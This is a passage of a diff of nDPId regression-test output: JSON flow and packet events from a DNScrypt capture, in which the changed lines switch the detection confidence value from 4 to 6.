{"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAXc+L0gAL0RbrcKAAABMw980MM3EPcGBKwyaUIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":385,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337048} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":385,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAABQ+L0Aub0Rk4oKAAABMw980AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAXc+L4gAL0RbrYKAAABMw980JWmEPcGBNnFaUABAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAIc+L9AAL0RUnUKAAABMw980NnYEPcCCHK1aUMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":388,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337048} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":388,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAABQ+L4Aub0Rk4kKAAABMw980AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAXc+MAgAL0RbrQKAAABMw980JvmEPcGBNOBaUQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":390,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337048} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":390,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAABQ+MAAub0Rk4cKAAABMw980AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAIc+MFAAL0RUnMKAAABMw980NJ\/EPcCCHK1aUEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": 